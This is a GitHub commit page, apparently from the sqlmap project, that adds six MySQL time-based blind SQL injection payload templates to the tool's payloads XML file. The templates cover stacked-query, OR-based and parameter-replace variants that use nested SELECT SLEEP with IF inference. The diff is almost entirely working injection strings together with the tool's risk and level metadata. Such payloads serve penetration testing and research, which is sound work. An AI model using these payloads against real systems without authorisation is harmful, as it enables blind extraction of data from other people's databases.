Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit c51ecf3

Browse files
bdamelebdamele
committed
ported the recent MySQL time-based payload (introduced with 66c2a79) to other techniques and conditions
1 parent 1636088 commit c51ecf3

1 file changed

Lines changed: 123 additions & 0 deletions

File tree

xml/payloads/00_payloads.xml

Lines changed: 123 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1641,6 +1641,47 @@ Tag: <test>
16411641
<!-- End of inline queries tests -->
16421642

16431643
<!-- Stacked queries tests -->
1644+
<test>
1645+
<title>MySQL &gt; 5.0.11 stacked queries (SELECT)</title>
1646+
<stype>4</stype>
1647+
<level>2</level>
1648+
<risk>0</risk>
1649+
<clause>0</clause>
1650+
<where>1</where>
1651+
<vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
1652+
<request>
1653+
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
1654+
</request>
1655+
<response>
1656+
<time>[SLEEPTIME]</time>
1657+
</response>
1658+
<details>
1659+
<dbms>MySQL</dbms>
1660+
<dbms_version>&gt; 5.0.11</dbms_version>
1661+
</details>
1662+
</test>
1663+
1664+
<test>
1665+
<title>MySQL &gt; 5.0.11 stacked queries (SELECT - comment)</title>
1666+
<stype>5</stype>
1667+
<level>4</level>
1668+
<risk>0</risk>
1669+
<clause>0</clause>
1670+
<where>1</where>
1671+
<vector>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
1672+
<request>
1673+
<payload>; (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
1674+
<comment>#</comment>
1675+
</request>
1676+
<response>
1677+
<time>[SLEEPTIME]</time>
1678+
</response>
1679+
<details>
1680+
<dbms>MySQL</dbms>
1681+
<dbms_version>&gt; 5.0.11</dbms_version>
1682+
</details>
1683+
</test>
1684+
16441685
<test>
16451686
<title>MySQL &gt; 5.0.11 stacked queries</title>
16461687
<stype>4</stype>
@@ -2524,6 +2565,47 @@ Tag: <test>
25242565
<!-- End of AND time-based blind tests -->
25252566

25262567
<!-- OR time-based blind tests -->
2568+
<test>
2569+
<title>MySQL &gt; 5.0.11 OR time-based blind (SELECT)</title>
2570+
<stype>5</stype>
2571+
<level>1</level>
2572+
<risk>3</risk>
2573+
<clause>1,2,3</clause>
2574+
<where>2</where>
2575+
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2576+
<request>
2577+
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2578+
</request>
2579+
<response>
2580+
<time>[SLEEPTIME]</time>
2581+
</response>
2582+
<details>
2583+
<dbms>MySQL</dbms>
2584+
<dbms_version>&gt; 5.0.11</dbms_version>
2585+
</details>
2586+
</test>
2587+
2588+
<test>
2589+
<title>MySQL &gt; 5.0.11 OR time-based blind (SELECT - comment)</title>
2590+
<stype>5</stype>
2591+
<level>4</level>
2592+
<risk>3</risk>
2593+
<clause>1,2,3</clause>
2594+
<where>2</where>
2595+
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2596+
<request>
2597+
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2598+
<comment>#</comment>
2599+
</request>
2600+
<response>
2601+
<time>[SLEEPTIME]</time>
2602+
</response>
2603+
<details>
2604+
<dbms>MySQL</dbms>
2605+
<dbms_version>&gt; 5.0.11</dbms_version>
2606+
</details>
2607+
</test>
2608+
25272609
<test>
25282610
<title>MySQL &gt; 5.0.11 OR time-based blind</title>
25292611
<stype>5</stype>
@@ -2846,6 +2928,47 @@ Tag: <test>
28462928
<!-- Time-based tests - After ORDER BY...LIMIT... -->
28472929

28482930
<!-- Time-based blind tests - Parameter replace -->
2931+
<test>
2932+
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT)</title>
2933+
<stype>5</stype>
2934+
<level>4</level>
2935+
<risk>1</risk>
2936+
<clause>1,2,3</clause>
2937+
<where>3</where>
2938+
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2939+
<request>
2940+
<payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2941+
</request>
2942+
<response>
2943+
<time>[SLEEPTIME]</time>
2944+
</response>
2945+
<details>
2946+
<dbms>MySQL</dbms>
2947+
<dbms_version>&gt; 5.0.11</dbms_version>
2948+
</details>
2949+
</test>
2950+
2951+
<test>
2952+
<title>MySQL &gt; 5.0.11 AND time-based blind (SELECT - comment)</title>
2953+
<stype>5</stype>
2954+
<level>5</level>
2955+
<risk>1</risk>
2956+
<clause>1,2,3</clause>
2957+
<where>3</where>
2958+
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
2959+
<request>
2960+
<payload>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
2961+
<comment>#</comment>
2962+
</request>
2963+
<response>
2964+
<time>[SLEEPTIME]</time>
2965+
</response>
2966+
<details>
2967+
<dbms>MySQL</dbms>
2968+
<dbms_version>&gt; 5.0.11</dbms_version>
2969+
</details>
2970+
</test>
2971+
28492972
<test>
28502973
<title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
28512974
<stype>5</stype>

0 commit comments

Comments
 (0)